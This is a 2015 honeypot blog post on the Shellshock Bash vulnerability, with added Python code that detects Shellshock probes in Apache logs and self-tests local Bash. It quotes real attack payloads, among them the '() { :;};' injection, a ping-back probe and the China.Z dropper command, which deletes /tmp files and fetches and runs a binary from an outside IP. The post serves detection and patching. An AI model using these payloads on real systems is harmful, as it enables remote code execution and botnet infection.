Wednesday, November 4, 2015

Shellshock revisited - Still a weapon of choice

I really thought that Shellshock was a shadow of the past, but I still see many different attempts to inject shellcode into Apache on my honeypots. These attempts are performed directly against Apache, or they try to inject it via CGI scripts.
I see it often enough to revisit this vulnerability again.

Shellshock

The whole trouble started with CVE-2014-6271, which was reported on September 24, 2014. The vulnerability resides directly in Bash: an attacker could inject code into what Bash parses as a normal shell function definition, and the injected code was executed without any check against the user's privileges. An attacker could therefore execute code with at least the privileges of the service daemon, or even root privileges. As you can see at https://exchange.xforce.ibmcloud.com/vulnerabilities/96153,
the vulnerability affects Bash 3.0, 3.1, 3.2 and 4.0, which were in use in almost all Linux and Unix distributions at that time.

The ease of exploiting the vulnerability is the main reason it became so widely used.

The general shape of an attack is:

() { :;}; echo test

As seen on my honeypot.

That is all that is needed. Today I see code like this on my honeypots:
() { :;};/usr/bin/perl -e '...'
() { :;}; /bin/bash -c "ping xx.xx.xx.xx -c 1"
In general, the Bash code is used to:
  1. Download (via wget, curl or fetch) malicious files (like a Perl backdoor, botnet or Java code) and execute them
  2. Report back to an external server (for example with a single ping, as in the second probe above)
Some of the malware was accessible for further investigation, so I can say that it is really mostly botnet and backdoor software written in Perl. I have the feeling that this attack is of "low cost" for the attacker, so they still run it against all network ranges to maybe get lucky.

China.Z

The most popular malware using the Shellshock vulnerability was China.Z:
 () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
As you can read on my honeypot-focused blog.
The malware is normally detected as Linux.Trojan.Agent by ClamAV.
The file named "java" is in fact not Java at all but a statically linked ELF binary, as file(1) shows:
java: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
China.Z is a DDoS bot that already ships with a hard-coded list of target IPs. It was compiled with GCC 4.0.0, the version found on Red Hat.
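All the probes quoted in this post, the ping-back as well as the China.Z downloader, share the same marker: a Bash function definition followed by a smuggled command. That makes them easy to pick out of Apache access logs. The following script is an added example and not code from the original post: it parses combined-format log lines, undoes the log escaping and URL encoding of the request, Referer and User-Agent fields (the fields mod_cgi copies into environment variables), flags the marker and pulls any download URLs out of the payload as IoCs. The log lines are constructed for this example with documentation IPs; the two payloads are the ones quoted above, and the fourth line goes beyond the post by showing the same marker URL-encoded into a query string. The function names are my own.

```python
import re
from urllib.parse import unquote

# Apache combined log format. Quoted fields may contain \" escapes (the probes
# above carry quotes), which a naive [^"]* would break on, so each quoted field
# is matched as a run of "not quote/backslash" or "backslash + any char".
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) '
    + QUOTED + ' ' + QUOTED + '$'
)

# Shellshock marker: "() {", a function body, "}" and the ';' that starts the
# smuggled command. Whitespace varies between probes ("{ :;}" vs "{ :; }").
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Download URLs inside the payload are the IoCs worth extracting.
URL_RE = re.compile(r"""https?://[^\s;"'<>]+""")

# Constructed sample log (documentation IPs). Payloads in lines 1 and 3 are the
# ones quoted in the post (the China.Z one shortened to its first command);
# line 4 is the same marker URL-encoded into the query string.
SAMPLE_LOG = r'''
203.0.113.5 - - [04/Nov/2015:10:12:01 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"ping xx.xx.xx.xx -c 1\""
203.0.113.5 - - [04/Nov/2015:10:12:02 +0100] "GET / HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [04/Nov/2015:10:15:44 +0100] "GET /cgi-bin/php HTTP/1.0" 404 209 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh\"" "-"
198.51.100.9 - - [04/Nov/2015:10:20:07 +0100] "GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20test HTTP/1.1" 400 0 "-" "curl/7.35.0"
'''


def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    ip, ts, req, status, size, referer, ua = m.groups()

    def clean(s):
        # Undo the log escaping and any URL encoding so the marker cannot hide.
        return unquote(s.replace('\\"', '"'))

    return {"ip": ip, "ts": ts, "status": int(status), "size": size,
            "req": clean(req), "referer": clean(referer), "ua": clean(ua)}


def find_shellshock(lines):
    """Return one hit per log line carrying the marker in any CGI-exposed field."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("req", "referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "field": field,
                             "payload": rec[field],
                             "urls": URL_RE.findall(rec[field])})
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG.strip().splitlines()):
        print(hit["ip"], hit["field"], hit["urls"], hit["payload"][:60])
```

Run against a real access log, the same `find_shellshock` call on `open(path)` gives you the attacking IPs, the header they abused and the URLs to block or fetch for analysis; the URL decoding step matters because the marker in a query string never appears literally in the log.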


Secure yourself

Securing against this vulnerability is not hard. The issue was fixed within days after it was first reported. The vulnerability resides in the following Bash versions:

Affected Products
GNU Bash 3.0
GNU Bash 3.1
GNU Bash 3.2
GNU Bash 4.0
GNU Bash 4.1
GNU Bash 4.2
GNU Bash 4.3
 (source: https://exchange.xforce.ibmcloud.com/vulnerabilities/96153)

Please keep in mind that although the vulnerability is associated with other software too (like mod_cgi or dhcp-server), all of these lead back to the vulnerability in Bash itself.
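Because every affected component ultimately hands the input to Bash, the quickest way to confirm the fix on one of your own hosts is to test Bash itself rather than each service in front of it. The script below is an added example, not code from this post: it runs the classic self-test (an environment variable shaped like an exported function with a trailing command, the same pattern the probes above use) against the local bash and reports whether the trailing command got executed. It also returns the version string, with the caveat that distributions backport fixes, so a version number from the affected list alone does not prove a host is vulnerable; the self-test does. The function names and the variable name SHELLSHOCK_PROBE are my own.

```python
import shutil
import subprocess
import os

# The probe: an exported-function definition followed by an extra command.
# Unpatched Bash ran that trailing command while importing the variable at
# startup; patched Bash either imports only the function or ignores it.
MARKER = "SHELLSHOCK_TRAILING_COMMAND_RAN"
PROBE = "() { :;}; echo " + MARKER


def bash_version(bash=None):
    """First line of `bash --version`, or None if no bash binary is found."""
    path = shutil.which(bash or "bash")
    if not path:
        return None
    out = subprocess.run([path, "--version"], capture_output=True,
                         text=True, timeout=10).stdout
    return out.splitlines()[0] if out else None


def check_bash(bash=None):
    """Return 'vulnerable', 'patched' or 'missing' for the given bash binary.

    A child bash is started with the probe in its environment and asked to run
    a harmless echo. Only a vulnerable bash also executes the trailing echo
    from the probe, so its marker shows up in stdout next to "probe-done".
    """
    path = shutil.which(bash or "bash")
    if not path:
        return "missing"
    env = dict(os.environ)
    env["SHELLSHOCK_PROBE"] = PROBE  # hypothetical variable name; any name works
    proc = subprocess.run([path, "-c", "echo probe-done"], env=env,
                          capture_output=True, text=True, timeout=10)
    # Early patched builds print a warning about the "function definition
    # attempt" on stderr; that is fine, only stdout decides.
    return "vulnerable" if MARKER in proc.stdout else "patched"


if __name__ == "__main__":
    print("bash:", bash_version())
    print("CVE-2014-6271 self-test:", check_bash())
```

Pass an explicit path (for example a second bash in a chroot or container image) to test binaries other than the one on PATH; a result of "patched" for the Bash that mod_cgi or the DHCP client actually invokes is what closes the door for all the services listed above.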